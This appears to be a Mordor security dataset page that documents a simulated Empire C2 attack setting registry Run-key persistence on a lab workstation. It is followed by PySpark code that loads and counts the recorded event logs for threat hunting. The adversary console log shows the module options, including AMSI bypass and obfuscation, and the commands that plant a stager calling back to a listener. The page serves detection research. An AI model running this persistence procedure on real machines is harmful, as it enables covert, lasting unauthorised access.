Empire Elevated Registry Run Keys

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/07/22

Modification Date

2020/09/04

Tactics

[‘TA0003’]

Techniques

[‘T1547.001’]

Tags

[‘Local Registry Modification’, ‘Registry Run Keys’]

Dataset Description

This dataset represents adversaries modifying local Run registry keys (i.e. HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run) for persistence. It also captures the execution of the persistence mechanism.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

elevated_registry

Adversary View

(Empire: 712ETU3B) > agents
[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
712ETU3B ps 172.18.39.5     WORKSTATION5      *MORDOR\pgustavo        powershell         9076   5/0.0    2020-07-22 04:06:31  http            

(Empire: agents) > 
(Empire: agents) > interact 712ETU3B
(Empire: 712ETU3B) > 
(Empire: 712ETU3B) > usemodule persistence/elevated/registry*

(Empire: 712ETU3B) > usemodule persistence/elevated/registry*
(Empire: powershell/persistence/elevated/registry) > info

              Name: Invoke-Registry
            Module: powershell/persistence/elevated/registry
        NeedsAdmin: True
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @mattifestation
  @harmj0y

Description:
  Persist a stager (or script) via the
  HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry
  key. This has an easy detection/removal rating.

Comments:
  https://github.com/mattifestation/PowerSploit/blob/master/Pe
  rsistence/Persistence.psm1

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        712ETU3B                  Agent to run module on.                 
  Listener         False                                 Listener to use.                        
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  KeyName          True        Updater                   Key name for the run trigger.           
  RegPath          False       HKLM:SOFTWARE\Microsoft\  Registry location to store the script   
                              Windows\CurrentVersion\D  code. Last element is the key name.     
                              ebug                    
  ADSPath          False                                 Alternate-data-stream location to store 
                                                        the script code.                        
  ExtFile          False                                 Use an external file for the payload    
                                                        instead of a stager.                    
  Cleanup          False                                 Switch. Cleanup the trigger and any     
                                                        script from specified location.         
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/persistence/elevated/registry) > set Listener http
(Empire: powershell/persistence/elevated/registry) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 712ETU3B to run TASK_CMD_WAIT
[*] Agent 712ETU3B tasked with task ID 7
[*] Tasked agent 712ETU3B to run module powershell/persistence/elevated/registry
(Empire: powershell/persistence/elevated/registry) > 
Registry persistence established using listener http stored in HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug.

(Empire: powershell/persistence/elevated/registry) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/persistence/host/empire_persistence_registry_modification_run_keys_elevated_user.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+-------------------------+----------------------------------------+-------+-----+
|Hostname                 |Channel                                 |EventID|count|
+-------------------------+----------------------------------------+-------+-----+
|MORDORDC.mordor.local    |Security                                |5156   |176  |
|WORKSTATION5.mordor.local|Windows PowerShell                      |800    |73   |
|WORKSTATION5.mordor.local|Security                                |4658   |64   |
|WORKSTATION5.mordor.local|Microsoft-Windows-PowerShell/Operational|4103   |62   |
|WORKSTATION5.mordor.local|Security                                |4690   |32   |
|WORKSTATION5.mordor.local|Security                                |4656   |32   |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational    |3      |30   |
|WORKSTATION5.mordor.local|Security                                |5156   |21   |
|MORDORDC.mordor.local    |Security                                |5158   |18   |
|WORKSTATION5.mordor.local|Microsoft-Windows-Sysmon/Operational    |10     |17   |
|WORKSTATION5.mordor.local|Security                                |5158   |14   |
|WORKSTATION5.mordor.local|Microsoft-Windows-Sysmon/Operational    |12     |13   |
|WORKSTATION6.mordor.local|Microsoft-Windows-Sysmon/Operational    |10     |13   |
|WORKSTATION5.mordor.local|Microsoft-Windows-Sysmon/Operational    |3      |13   |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational    |7      |10   |
|WORKSTATION5.mordor.local|Microsoft-Windows-Sysmon/Operational    |13     |6    |
|MORDORDC.mordor.local    |Security                                |4658   |5    |
|MORDORDC.mordor.local    |Security                                |4634   |5    |
|MORDORDC.mordor.local    |Security                                |5145   |4    |
|MORDORDC.mordor.local    |Microsoft-Windows-Sysmon/Operational    |18     |4    |
+-------------------------+----------------------------------------+-------+-----+
only showing top 20 rows